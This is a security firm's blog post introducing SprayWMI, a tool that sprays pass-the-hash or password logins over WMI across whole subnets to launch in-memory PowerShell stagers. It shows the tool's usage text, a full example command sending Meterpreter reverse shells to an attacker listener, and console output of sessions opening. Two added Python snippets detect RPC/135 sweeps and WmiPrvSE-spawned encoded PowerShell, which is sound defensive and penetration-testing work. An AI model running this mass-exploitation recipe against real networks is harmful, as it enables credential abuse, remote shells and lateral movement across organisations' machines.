October 15, 2015

New Tool: SprayWMI - Mass WMI Pwnage

Written by David Kennedy
A while back one of our folks, Justin Elze (who also wears white socks with business attire, just saying), wrote an amazing blog post on why there is no need for PSEXEC: https://www.trustedsec.com/june-2015/no_psexec_needed/ In that post, Justin went through how to leverage wmis and wmic for exploitation instead of PSEXEC. Some of the downfalls of PSEXEC are that pass the hash with it is detected pretty easily, and often an executable needs to be dropped and a service created, which is noisy. WMI is an extremely powerful method that uses port 135 (RPC) to establish communication and perform actions. The cool part with WMI is that it doesn't leave files on the system and can be used to launch attacks such as Magic Unicorn (github.com/trustedsec/unicorn) for pure memory-based exploitation on a large scale.

Recently Justin and I were on a pentest and found that Server 2012 R2 in a locked-down mode was not allowing PSEXEC (psexec_commands specifically) to execute properly, so we were not able to drop the shells we needed. Alva Lease, Skip Duckwall, and Chris Campbell did some awesome work in a BH talk a while back and released pth-suite, which includes patched versions of wmic and wmis that allow pass the hash. That lets you compromise one system at a time using the standard syntax to execute a command. We wanted mass exploitation, so we wrote a tool to automate it.

Introducing SprayWMI, which leverages wmis and Magic Unicorn to sweep subnet ranges for port 135, attempt to log in with either a password or hashes, and generate the PowerShell injection that gives you access to your payloads instantly and without touching disk. This is a full replacement for traditional PSEXEC and is what we recommend. SprayWMI moves super quick, finishing a class C in around 4 seconds, and it automatically creates the injection code and the listener inside of Metasploit and launches everything for you.
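The sweep that makes SprayWMI fast (every host in a class C probed on port 135 within a few seconds) is also the cheapest place for a defender to notice it. The following is an added example written for this post, not code from SprayWMI or TrustedSec: it reads constructed connection-log lines (the key=value format, the ten-host threshold and the five-second window are all assumptions; adapt the regex to your firewall or NetFlow export) and flags any source that reaches TCP/135 on ten or more distinct hosts inside the window.

```python
"""Flag a host that sweeps a subnet for TCP/135 (RPC) in a short window.

Added example for this post, not part of SprayWMI. The log format below is
constructed; the detection is a sliding window over distinct destinations
per source on the RPC endpoint-mapper port.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed key=value log layout: "<iso-timestamp> src=A dst=B dport=N ..."
LOG_RE = re.compile(
    r"(?P<ts>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "src": m.group("src"),
        "dst": m.group("dst"),
        "dport": int(m.group("dport")),
    }


def find_rpc_sweeps(lines, threshold=10, window=5.0, port=135):
    """Return {src: time_of_first_alert} for every source that touched
    at least `threshold` distinct destinations on `port` within `window`
    seconds. Events are sorted by time so unordered input is fine."""
    events = [ev for ev in map(parse_line, lines) if ev and ev["dport"] == port]
    events.sort(key=lambda ev: ev["ts"])
    recent = defaultdict(deque)  # src -> deque of (ts, dst) inside the window
    alerts = {}
    for ev in events:
        q = recent[ev["src"]]
        q.append((ev["ts"], ev["dst"]))
        # Evict anything older than the window relative to the newest event.
        while (ev["ts"] - q[0][0]).total_seconds() > window:
            q.popleft()
        distinct = {dst for _, dst in q}
        if len(distinct) >= threshold and ev["src"] not in alerts:
            alerts[ev["src"]] = ev["ts"]
    return alerts


def _build_sample_log():
    """Constructed sample: one sweeping host, one slow admin box, some SMB."""
    base = datetime(2015, 10, 13, 4, 33, 50)
    lines = []
    # Sweeping host: 24 addresses in 192.168.90.0/24 in under four seconds.
    for i in range(24):
        ts = base + timedelta(milliseconds=160 * i)
        lines.append(f"{ts.isoformat()} src=192.168.47.24 dst=192.168.90.{i + 1} "
                     f"dport=135 proto=tcp action=allow")
    # Benign admin workstation: three WMI targets spread over a minute.
    for i, sec in enumerate((0, 25, 55)):
        ts = base + timedelta(seconds=sec)
        lines.append(f"{ts.isoformat()} src=192.168.47.10 dst=192.168.90.{50 + i} "
                     f"dport=135 proto=tcp action=allow")
    # Unrelated SMB traffic on 445, ignored by the port filter.
    lines.append(f"{base.isoformat()} src=192.168.47.11 dst=192.168.90.5 "
                 f"dport=445 proto=tcp action=allow")
    return lines


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    for src, when in find_rpc_sweeps(SAMPLE_LOG).items():
        print(f"[!] possible RPC/135 sweep from {src} starting {when.isoformat()}")
```

The window is measured against the newest event for each source, so an administrator who legitimately manages three boxes over a minute never accumulates ten distinct destinations, while the sweeping host trips the threshold on its tenth target, about 1.4 seconds into the scan.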
All you need to do is sit back and watch the shells flow in. Below is the standard syntax to start the tool:
root@stronghold:/home/relik/Desktop/git/spraywmi# python spraywmi.py 

 __   __   __                        
/__` |__) |__)  /\  \ / |  |  |\/| | 
.__/ |    |  \ /~~\  |  |/\|  |  | | 


	Written by: David Kennedy @ TrustedSec
	
                                     
SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

Flag descriptions:

DOMAIN - domain you are attacking - if its local, just specify workgroup
USERNAME - username to authenticate on the remote Windows system
PASSWORD - password or password hash lm:ntlm to use on the remote Windows system
CIDR_RANGE,CIDR_RANGE or ips.txt - you can specify a single ip, a CIDR range (192.168.1.1/24) or multiple CIDRs such as 192.168.1.1/24,192.168.2.1/24. You can also specify a file (ex: file.txt) which has single IP addresses on a new line. 
METASPLOIT_PAYLOAD - this is the payload you want to use example: windows/meterpreter/reverse_tcp
REVERSE_SHELL_IP - this is the IP address of your attacker machine that you want to create a listener or use an already established listener
REVERSE_SHELL_PORT - port to connect back on for the reverse
OPTIONAL: NO - specify no if you do not want to create a listener - this is useful if you already have a listener established. If you do not specify a value here, it will automatically create a listener for you.

Usage: python spraywmi.py       


root@stronghold:/home/relik/Desktop/git/spraywmi# 
Actual usage is pretty simple:
root@stronghold:/home/relik# python spraywmi.py TS kennedy-test complexP255w0rd! 192.168.90.1/24,192.168.0.1/24,192.168.59.1/24,192.168.96.1/24,192.168.1.1/24 windows/meterpreter/reverse_tcp 192.168.47.24 443
Next, let the shells rain in:
[*] Generating shellcode through unicorn, could take a few seconds...
[*] Launching the listener in the background...
[*] Waiting for the listener to start first before we continue forward...
[*] Be patient, Metaploit takes a little bit to start...
[*] Sweeping network for ports that are open first, then moving through... Be patient.
[*] Launching WMI spray against IP: 192.168.90.1 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.20 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.21 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.22 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.23 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.242 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.1.13 - you should have a shell in the background. Once finished, shell will spawn
[*] Spraying is still happening in the background, shells should arrive as they complete.
[*] Interacting with Metasploit...

msf exploit(handler) >
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.174
[*] Meterpreter session 1 opened (192.168.47.24:443 -> 192.168.90.174:49868) at 2015-10-13 04:33:55 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.203
[*] Meterpreter session 2 opened (192.168.47.24:443 -> 192.168.90.203:51333) at 2015-10-13 04:33:59 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.184
[*] Meterpreter session 3 opened (192.168.47.24:443 -> 192.168.90.184:61218) at 2015-10-13 04:34:02 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.204
[*] Meterpreter session 4 opened (192.168.47.24:443 -> 192.168.90.204:54219) at 2015-10-13 04:34:06 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.175
[*] Meterpreter session 5 opened (192.168.47.24:443 -> 192.168.90.175:54210) at 2015-10-13 04:34:10 -0400
[*] Meterpreter session 13 opened (192.168.47.24:443 -> 192.168.90.248:53657) at 2015-10-13 04:34:31 -040
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.39
[*] Meterpreter session 14 opened (192.168.47.24:443 -> 192.168.90.39:60451) at 2015-10-13 04:34:35 -0400
[*] Encoded stage with x86/shikata_ga_nai
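On the target side, a command run through WMI's Win32_Process.Create (which is what wmic and wmis drive) starts as a child of WmiPrvSE.exe, so the injection above shows up in process-creation telemetry as powershell.exe parented by WmiPrvSE.exe, typically with hidden-window and encoded-command flags. The block below is an added example for this post, not part of SprayWMI or unicorn: the events, the Sysmon/4688-style field names and the placeholder encoded command are all constructed.

```python
"""Triage process-creation events for remote WMI command execution.

Added example for this post, not SprayWMI code. Processes created through
WMI's Win32_Process.Create run under WmiPrvSE.exe on the target, so a
PowerShell child of WmiPrvSE.exe, especially with hidden-window or
-EncodedCommand flags, is the host-side footprint of the technique.
Event field names (Computer, ParentImage, Image, CommandLine) mirror
Sysmon Event ID 1 but are an assumption here; the sample events are constructed.
"""
import base64
import json
import re

# Longest alternative first so "-enc" is not consumed as "-e" + "nc".
ENC_RE = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
SUSPICIOUS_FLAGS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                    "-noni", "-noninteractive")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process_event(ev):
    """Return a finding dict for a WMI-spawned process, or None."""
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmdline = ev.get("CommandLine", "")
    if parent != "wmiprvse.exe":
        return None
    finding = {
        "host": ev.get("Computer"),
        "image": image,
        "severity": "medium",
        "reason": "process spawned by the WMI provider host (Win32_Process.Create)",
    }
    if image in ("powershell.exe", "pwsh.exe"):
        low = cmdline.lower()
        if any(flag in low for flag in SUSPICIOUS_FLAGS) or ENC_RE.search(cmdline):
            finding["severity"] = "high"
            finding["reason"] = ("PowerShell under WmiPrvSE.exe with hidden, "
                                 "non-interactive or encoded-command flags")
        # Give the analyst the plaintext instead of a base64 blob.
        finding["decoded"] = decode_encoded_command(cmdline)
    return finding


def triage_log(json_lines):
    """Run triage over JSON-per-line events and return the findings."""
    findings = []
    for line in json_lines:
        finding = triage_process_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


def _encoded(ps):
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed events: one WMI-launched hidden/encoded PowerShell, one normal
# script run from Explorer, one plain cmd.exe launched through WMI.
SAMPLE_EVENTS = [
    json.dumps({"Computer": "WS-90-174",
                "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell.exe -nop -w hidden -enc "
                               + _encoded("Write-Output 'placeholder for injected stager'")}),
    json.dumps({"Computer": "WS-90-203",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"}),
    json.dumps({"Computer": "WS-90-184",
                "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
                "Image": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": "cmd.exe /c ipconfig /all"}),
]

if __name__ == "__main__":
    for f in triage_log(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: {f['image']} - {f['reason']}")
        if f.get("decoded"):
            print("    decoded:", f["decoded"])
```

Any child of WmiPrvSE.exe is worth a look, because nothing interactive on a workstation normally runs there; the severity bump is reserved for the PowerShell flag combination that in-memory stagers rely on, and the decoded command line is what lets an analyst tell a stager apart from an inventory script.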
SprayWMI can be found on our github page here: https://github.com/trustedsec/spraywmi

This article was written by David Kennedy - Founder of TrustedSec